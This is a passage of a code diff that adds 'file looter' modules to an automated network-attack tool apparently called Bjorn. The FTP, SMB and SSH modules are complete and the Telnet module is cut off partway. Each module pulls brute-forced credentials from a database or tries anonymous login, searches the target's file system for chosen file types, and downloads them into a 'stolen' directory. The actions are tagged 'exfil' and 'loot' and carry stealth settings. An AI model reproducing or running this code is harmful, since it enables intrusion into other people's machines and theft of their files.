|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
ftp.cwd(dir_path)
|
||||
items = ftp.nlst()
|
||||
|
||||
for item in items:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
|
||||
try:
|
||||
ftp.cwd(item) # if ok -> directory
|
||||
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
|
||||
ftp.cwd('..')
|
||||
except Exception:
|
||||
# not a dir => file candidate
|
||||
if any(item.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
|
||||
any(name in item for name in (self.shared_data.steal_file_names or [])):
|
||||
files.append(os.path.join(dir_path, item))
|
||||
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
|
||||
except Exception as e:
|
||||
logger.error(f"FTP path error {dir_path}: {e}")
|
||||
raise
|
||||
return files
|
||||
|
||||
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
|
||||
try:
|
||||
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
|
||||
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
|
||||
with open(local_file_path, 'wb') as f:
|
||||
ftp.retrbinary(f'RETR {remote_file}', f.write)
|
||||
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
|
||||
except Exception as e:
|
||||
logger.error(f"FTP download error {remote_file}: {e}")
|
||||
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
port_i = b_port
|
||||
|
||||
creds = self._get_creds_for_target(ip, port_i)
|
||||
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
|
||||
|
||||
def try_anonymous() -> Optional[FTP]:
|
||||
return self.connect_ftp(ip, 'anonymous', '')
|
||||
|
||||
if not creds and not try_anonymous():
|
||||
logger.error(f"No FTP credentials for {ip}. Skipping.")
|
||||
return 'failed'
|
||||
|
||||
def _timeout():
|
||||
if not self.ftp_connected:
|
||||
logger.error(f"No FTP connection within 4 minutes for {ip}. Failing.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
|
||||
success = False
|
||||
|
||||
# Anonymous first
|
||||
ftp = try_anonymous()
|
||||
if ftp:
|
||||
files = self.find_files(ftp, '/')
|
||||
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
|
||||
if files:
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
self.steal_file(ftp, remote, local_dir)
|
||||
logger.success(f"Stole {len(files)} files from {ip} via anonymous")
|
||||
success = True
|
||||
try:
|
||||
ftp.quit()
|
||||
except Exception:
|
||||
pass
|
||||
if success:
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
|
||||
# Authenticated creds
|
||||
for username, password in creds:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
try:
|
||||
logger.info(f"Trying FTP {username}:{password} @ {ip}")
|
||||
ftp = self.connect_ftp(ip, username, password)
|
||||
if not ftp:
|
||||
continue
|
||||
files = self.find_files(ftp, '/')
|
||||
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
|
||||
if files:
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
self.steal_file(ftp, remote, local_dir)
|
||||
logger.info(f"Stole {len(files)} files from {ip} as {username}")
|
||||
success = True
|
||||
try:
|
||||
ftp.quit()
|
||||
except Exception:
|
||||
pass
|
||||
if success:
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
except Exception as e:
|
||||
logger.error(f"FTP loot error {ip} {username}: {e}")
|
||||
|
||||
timer.cancel()
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
252
resources/default_config/actions/steal_files_smb.py
Normal file
@@ -0,0 +1,252 @@
|
||||
"""
|
||||
steal_files_smb.py — SMB file looter (DB-backed).
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
|
||||
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
|
||||
- Also try anonymous (''/'').
|
||||
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
|
||||
"""
|
||||
|
||||
import os
|
||||
import logging
|
||||
import time
|
||||
from threading import Timer
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
|
||||
from smb.SMBConnection import SMBConnection
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "StealFilesSMB"
|
||||
b_module = "steal_files_smb"
|
||||
b_status = "steal_files_smb"
|
||||
b_parent = "SMBBruteforce"
|
||||
b_port = 445
|
||||
|
||||
|
||||
class StealFilesSMB:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.smb_connected = False
|
||||
self.stop_execution = False
|
||||
self.IGNORED_SHARES = set(self.shared_data.ignored_smb_shares or [])
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
logger.info("StealFilesSMB initialized")
|
||||
|
||||
# -------- Identity cache --------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# -------- Creds (grouped by share) --------
|
||||
def _get_creds_by_share(self, ip: str, port: int) -> Dict[str, List[Tuple[str, str]]]:
|
||||
"""
|
||||
Returns {share: [(user,pass), ...]} from DB.creds (service='smb', database=share).
|
||||
Prefer IP; also include MAC if known. Dedup per share.
|
||||
"""
|
||||
mac = self.mac_for_ip(ip)
|
||||
params = {"ip": ip, "port": port, "mac": mac or ""}
|
||||
|
||||
by_ip = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password","database"
|
||||
FROM creds
|
||||
WHERE service='smb'
|
||||
AND COALESCE(ip,'')=:ip
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
by_mac = []
|
||||
if mac:
|
||||
by_mac = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password","database"
|
||||
FROM creds
|
||||
WHERE service='smb'
|
||||
AND COALESCE(mac_address,'')=:mac
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
out: Dict[str, List[Tuple[str, str]]] = {}
|
||||
seen: Dict[str, set] = {}
|
||||
for row in (by_ip + by_mac):
|
||||
share = str(row.get("database") or "").strip()
|
||||
user = str(row.get("user") or "").strip()
|
||||
pwd = str(row.get("password") or "").strip()
|
||||
if not user or not share:
|
||||
continue
|
||||
if share not in out:
|
||||
out[share], seen[share] = [], set()
|
||||
if (user, pwd) in seen[share]:
|
||||
continue
|
||||
seen[share].add((user, pwd))
|
||||
out[share].append((user, pwd))
|
||||
return out
|
||||
|
||||
# -------- SMB helpers --------
|
||||
def connect_smb(self, ip: str, username: str, password: str) -> Optional[SMBConnection]:
|
||||
try:
|
||||
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
|
||||
conn.connect(ip, b_port)
|
||||
self.smb_connected = True
|
||||
logger.info(f"Connected SMB {ip} as {username}")
|
||||
return conn
|
||||
except Exception as e:
|
||||
logger.error(f"SMB connect error {ip} {username}: {e}")
|
||||
return None
|
||||
|
||||
def list_shares(self, conn: SMBConnection):
|
||||
try:
|
||||
shares = conn.listShares()
|
||||
return [s for s in shares if (s.name not in self.IGNORED_SHARES and not s.isSpecial and not s.isTemporary)]
|
||||
except Exception as e:
|
||||
logger.error(f"list_shares error: {e}")
|
||||
return []
|
||||
|
||||
def find_files(self, conn: SMBConnection, share: str, dir_path: str) -> List[str]:
|
||||
files: List[str] = []
|
||||
try:
|
||||
for entry in conn.listPath(share, dir_path):
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
if entry.isDirectory:
|
||||
if entry.filename not in ('.', '..'):
|
||||
files.extend(self.find_files(conn, share, os.path.join(dir_path, entry.filename)))
|
||||
else:
|
||||
name = entry.filename
|
||||
if any(name.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
|
||||
any(sn in name for sn in (self.shared_data.steal_file_names or [])):
|
||||
files.append(os.path.join(dir_path, name))
|
||||
return files
|
||||
except Exception as e:
|
||||
logger.error(f"SMB path error {share}:{dir_path}: {e}")
|
||||
raise
|
||||
|
||||
def steal_file(self, conn: SMBConnection, share: str, remote_file: str, base_dir: str) -> None:
|
||||
try:
|
||||
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
|
||||
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
|
||||
with open(local_file_path, 'wb') as f:
|
||||
conn.retrieveFile(share, remote_file, f)
|
||||
logger.success(f"Downloaded {share}:{remote_file} -> {local_file_path}")
|
||||
except Exception as e:
|
||||
logger.error(f"SMB download error {share}:{remote_file}: {e}")
|
||||
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
port_i = b_port
|
||||
|
||||
creds_by_share = self._get_creds_by_share(ip, port_i)
|
||||
logger.info(f"Found SMB creds for {len(creds_by_share)} share(s) in DB for {ip}")
|
||||
|
||||
def _timeout():
|
||||
if not self.smb_connected:
|
||||
logger.error(f"No SMB connection within 4 minutes for {ip}. Failing.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
|
||||
success = False
|
||||
|
||||
# Anonymous first (''/'')
|
||||
try:
|
||||
conn = self.connect_smb(ip, '', '')
|
||||
if conn:
|
||||
shares = self.list_shares(conn)
|
||||
for s in shares:
|
||||
files = self.find_files(conn, s.name, '/')
|
||||
if files:
|
||||
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{s.name}")
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
self.steal_file(conn, s.name, remote, base)
|
||||
logger.success(f"Stole {len(files)} files from {ip} via anonymous on {s.name}")
|
||||
success = True
|
||||
try:
|
||||
conn.close()
|
||||
except Exception:
|
||||
pass
|
||||
except Exception as e:
|
||||
logger.info(f"Anonymous SMB failed on {ip}: {e}")
|
||||
|
||||
if success:
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
|
||||
# Per-share credentials
|
||||
for share, creds in creds_by_share.items():
|
||||
if share in self.IGNORED_SHARES:
|
||||
continue
|
||||
for username, password in creds:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
try:
|
||||
conn = self.connect_smb(ip, username, password)
|
||||
if not conn:
|
||||
continue
|
||||
files = self.find_files(conn, share, '/')
|
||||
if files:
|
||||
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{share}")
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
self.steal_file(conn, share, remote, base)
|
||||
logger.info(f"Stole {len(files)} files from {ip} share={share} as {username}")
|
||||
success = True
|
||||
try:
|
||||
conn.close()
|
||||
except Exception:
|
||||
pass
|
||||
if success:
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
except Exception as e:
|
||||
logger.error(f"SMB loot error {ip} {share} {username}: {e}")
|
||||
|
||||
timer.cancel()
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
330
resources/default_config/actions/steal_files_ssh.py
Normal file
@@ -0,0 +1,330 @@
|
||||
"""
|
||||
steal_files_ssh.py — SSH file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
|
||||
- SSH credentials are read from the DB table `creds` (service='ssh').
|
||||
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
|
||||
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
|
||||
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
|
||||
|
||||
Parent gate:
|
||||
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
|
||||
- This action runs once per eligible target (alive, open port, parent OK).
|
||||
"""
|
||||
|
||||
import os
|
||||
import time
|
||||
import logging
|
||||
import paramiko
|
||||
from threading import Timer
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
# Logger for this module
|
||||
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
|
||||
|
||||
# Silence Paramiko's internal logs (no "Error reading SSH protocol banner" spam)
|
||||
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys"):
|
||||
logging.getLogger(_name).setLevel(logging.CRITICAL)
|
||||
|
||||
b_class = "StealFilesSSH" # Unique action identifier
|
||||
b_module = "steal_files_ssh" # Python module name (this file without .py)
|
||||
b_status = "steal_files_ssh" # Human/readable status key (free form)
|
||||
|
||||
b_action = "normal" # 'normal' (per-host) or 'global'
|
||||
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
|
||||
b_port = 22 # Preferred target port (used if present on host)
|
||||
|
||||
# Trigger strategy:
|
||||
# - Prefer to run as soon as SSH credentials exist for this MAC (on_cred_found:ssh).
|
||||
# - Also allow starting when the host exposes SSH (on_service:ssh),
|
||||
# but the requirements below still enforce that SSH creds must be present.
|
||||
b_trigger = 'on_any:["on_cred_found:ssh","on_service:ssh"]'
|
||||
|
||||
# Requirements (JSON string):
|
||||
# - must have SSH credentials on this MAC
|
||||
# - must have port 22 (legacy fallback if port_services is missing)
|
||||
# - limit concurrent running actions system-wide to 2 for safety
|
||||
b_requires = '{"all":[{"has_cred":"ssh"},{"has_port":22},{"max_concurrent":2}]}'
|
||||
|
||||
# Scheduling / limits
|
||||
b_priority = 70 # 0..100 (higher processed first in this schema)
|
||||
b_timeout = 900 # seconds before a pending queue item expires
|
||||
b_max_retries = 1 # minimal retries; avoid noisy re-runs
|
||||
b_cooldown = 86400 # seconds (per-host cooldown between runs)
|
||||
b_rate_limit = "3/86400" # at most 3 executions/day per host (extra guard)
|
||||
|
||||
# Risk / hygiene
|
||||
b_stealth_level = 6 # 1..10 (higher = more stealthy)
|
||||
b_risk_level = "high" # 'low' | 'medium' | 'high'
|
||||
b_enabled = 1 # set to 0 to disable from DB sync
|
||||
|
||||
# Tags (free taxonomy, JSON-ified by sync_actions)
|
||||
b_tags = ["exfil", "ssh", "loot"]
|
||||
|
||||
class StealFilesSSH:
|
||||
"""StealFilesSSH: connects via SSH using known creds and downloads matching files."""
|
||||
|
||||
def __init__(self, shared_data: SharedData):
|
||||
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
|
||||
self.shared_data = shared_data
|
||||
self.sftp_connected = False # flipped to True on first SFTP open
|
||||
self.stop_execution = False # global kill switch (timer / orchestrator exit)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
logger.info("StealFilesSSH initialized")
|
||||
|
||||
# --------------------- Identity cache (hosts) ---------------------
|
||||
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
"""Return MAC for IP using the local cache (refresh on miss)."""
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
"""Return current hostname for IP using the local cache (refresh on miss)."""
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# --------------------- Credentials (creds table) ---------------------
|
||||
|
||||
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
|
||||
"""
|
||||
Fetch SSH creds for this target from DB.creds.
|
||||
Strategy:
|
||||
- Prefer rows where service='ssh' AND ip=target_ip AND (port is NULL or matches).
|
||||
- Also include rows for same MAC (if known), still service='ssh'.
|
||||
Returns list of (username, password), deduplicated.
|
||||
"""
|
||||
mac = self.mac_for_ip(ip)
|
||||
params = {"ip": ip, "port": port, "mac": mac or ""}
|
||||
|
||||
# Pull by IP
|
||||
by_ip = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user", "password"
|
||||
FROM creds
|
||||
WHERE service='ssh'
|
||||
AND COALESCE(ip,'') = :ip
|
||||
AND (port IS NULL OR port = :port)
|
||||
""",
|
||||
params
|
||||
)
|
||||
|
||||
# Pull by MAC (if we have one)
|
||||
by_mac = []
|
||||
if mac:
|
||||
by_mac = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user", "password"
|
||||
FROM creds
|
||||
WHERE service='ssh'
|
||||
AND COALESCE(mac_address,'') = :mac
|
||||
AND (port IS NULL OR port = :port)
|
||||
""",
|
||||
params
|
||||
)
|
||||
|
||||
# Deduplicate while preserving order
|
||||
seen = set()
|
||||
out: List[Tuple[str, str]] = []
|
||||
for row in (by_ip + by_mac):
|
||||
u = str(row.get("user") or "").strip()
|
||||
p = str(row.get("password") or "").strip()
|
||||
if not u or (u, p) in seen:
|
||||
continue
|
||||
seen.add((u, p))
|
||||
out.append((u, p))
|
||||
return out
|
||||
|
||||
# --------------------- SSH helpers ---------------------
|
||||
|
||||
def connect_ssh(self, ip: str, username: str, password: str, port: int = b_port, timeout: int = 10):
|
||||
"""
|
||||
Open an SSH connection (no agent, no keys). Returns an active SSHClient or raises.
|
||||
NOTE: Paramiko logs are silenced at module import level.
|
||||
"""
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
# Be explicit: no interactive agents/keys; bounded timeouts to avoid hangs
|
||||
ssh.connect(
|
||||
hostname=ip,
|
||||
username=username,
|
||||
password=password,
|
||||
port=port,
|
||||
timeout=timeout,
|
||||
auth_timeout=timeout,
|
||||
banner_timeout=timeout,
|
||||
allow_agent=False,
|
||||
look_for_keys=False,
|
||||
)
|
||||
logger.info(f"Connected to {ip} via SSH as {username}")
|
||||
return ssh
|
||||
|
||||
def find_files(self, ssh: paramiko.SSHClient, dir_path: str) -> List[str]:
|
||||
"""
|
||||
List candidate files from remote dir, filtered by config:
|
||||
- shared_data.steal_file_extensions (endswith)
|
||||
- shared_data.steal_file_names (substring match)
|
||||
Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
|
||||
"""
|
||||
# Quiet 'permission denied' messages via redirection
|
||||
cmd = f'find {dir_path} -type f 2>/dev/null'
|
||||
stdin, stdout, stderr = ssh.exec_command(cmd)
|
||||
files = (stdout.read().decode(errors="ignore") or "").splitlines()
|
||||
|
||||
exts = set(self.shared_data.steal_file_extensions or [])
|
||||
names = set(self.shared_data.steal_file_names or [])
|
||||
if not exts and not names:
|
||||
# If no filters are defined, do nothing (too risky to pull everything).
|
||||
logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
|
||||
return []
|
||||
|
||||
matches: List[str] = []
|
||||
for fpath in files:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
fname = os.path.basename(fpath)
|
||||
if (exts and any(fname.endswith(ext) for ext in exts)) or (names and any(sn in fname for sn in names)):
|
||||
matches.append(fpath)
|
||||
|
||||
logger.info(f"Found {len(matches)} matching files in {dir_path}")
|
||||
return matches
|
||||
|
||||
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
|
||||
"""
|
||||
Download a single remote file into the given local dir, preserving subdirs.
|
||||
"""
|
||||
sftp = ssh.open_sftp()
|
||||
self.sftp_connected = True # first time we open SFTP, mark as connected
|
||||
|
||||
# Preserve partial directory structure under local_dir
|
||||
remote_dir = os.path.dirname(remote_file)
|
||||
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
|
||||
os.makedirs(local_file_dir, exist_ok=True)
|
||||
|
||||
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
|
||||
sftp.get(remote_file, local_file_path)
|
||||
sftp.close()
|
||||
|
||||
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
|
||||
|
||||
# --------------------- Orchestrator entrypoint ---------------------
|
||||
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
"""
|
||||
Orchestrator entrypoint (signature preserved):
|
||||
- ip: target IP
|
||||
- port: str (expected '22')
|
||||
- row: current target row (compat structure built by shared_data)
|
||||
- status_key: action name (b_class)
|
||||
Returns 'success' if at least one file stolen; else 'failed'.
|
||||
"""
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
|
||||
# Gather credentials from DB
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
port_i = b_port
|
||||
|
||||
creds = self._get_creds_for_target(ip, port_i)
|
||||
logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
|
||||
if not creds:
|
||||
logger.error(f"No SSH credentials for {ip}. Skipping.")
|
||||
return 'failed'
|
||||
|
||||
# Define a timer: if we never establish SFTP in 4 minutes, abort
|
||||
def _timeout():
|
||||
if not self.sftp_connected:
|
||||
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
# Identify where to save loot
|
||||
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
|
||||
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"ssh/{mac}_{ip}")
|
||||
|
||||
# Try each credential until success (or interrupted)
|
||||
success_any = False
|
||||
for username, password in creds:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
|
||||
try:
|
||||
logger.info(f"Trying credential {username}:{password} for {ip}")
|
||||
ssh = self.connect_ssh(ip, username, password, port=port_i)
|
||||
# Search from root; filtered by config
|
||||
files = self.find_files(ssh, '/')
|
||||
|
||||
if files:
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted during download.")
|
||||
break
|
||||
self.steal_file(ssh, remote, base_dir)
|
||||
|
||||
logger.success(f"Successfully stole {len(files)} files from {ip}:{port_i} as {username}")
|
||||
success_any = True
|
||||
|
||||
try:
|
||||
ssh.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if success_any:
|
||||
break # one successful cred is enough
|
||||
|
||||
except Exception as e:
|
||||
# Stay quiet on Paramiko internals; just log the reason and try next cred
|
||||
logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")
|
||||
|
||||
timer.cancel()
|
||||
return 'success' if success_any else 'failed'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Minimal smoke test if run standalone (not used in production; orchestrator calls execute()).
|
||||
try:
|
||||
sd = SharedData()
|
||||
action = StealFilesSSH(sd)
|
||||
# Example (replace with a real IP that has creds in DB):
|
||||
# result = action.execute("192.168.1.10", "22", {"MAC Address": "AA:BB:CC:DD:EE:FF"}, b_status)
|
||||
# print("Result:", result)
|
||||
except Exception as e:
|
||||
logger.error(f"Error in main execution: {e}")
|
||||
218
resources/default_config/actions/steal_files_telnet.py
Normal file
@@ -0,0 +1,218 @@
|
||||
"""
|
||||
steal_files_telnet.py — Telnet file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
|
||||
- Credentials read from DB.creds (service='telnet'); we try each pair.
|
||||
- Files found via 'find / -type f', then retrieved with 'cat'.
|
||||
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
|
||||
"""
|
||||
|
||||
import os
|
||||
import telnetlib
|
||||
import logging
|
||||
import time
|
||||
from threading import Timer
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "StealFilesTelnet"
|
||||
b_module = "steal_files_telnet"
|
||||
b_status = "steal_files_telnet"
|
||||
b_parent = "TelnetBruteforce"
|
||||
b_port = 23
|
||||
|
||||
|
||||
class StealFilesTelnet:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.telnet_connected = False
|
||||
self.stop_execution = False
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
logger.info("StealFilesTelnet initialized")
|
||||
|
||||
# -------- Identity cache --------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# -------- Creds --------
|
||||
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
|
||||
mac = self.mac_for_ip(ip)
|
||||
params = {"ip": ip, "port": port, "mac": mac or ""}
|
||||
|
||||
by_ip = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password"
|
||||
FROM creds
|
||||
WHERE service='telnet'
|
||||
AND COALESCE(ip,'')=:ip
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
by_mac = []
|
||||
if mac:
|
||||
by_mac = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password"
|
||||
FROM creds
|
||||
WHERE service='telnet'
|
||||
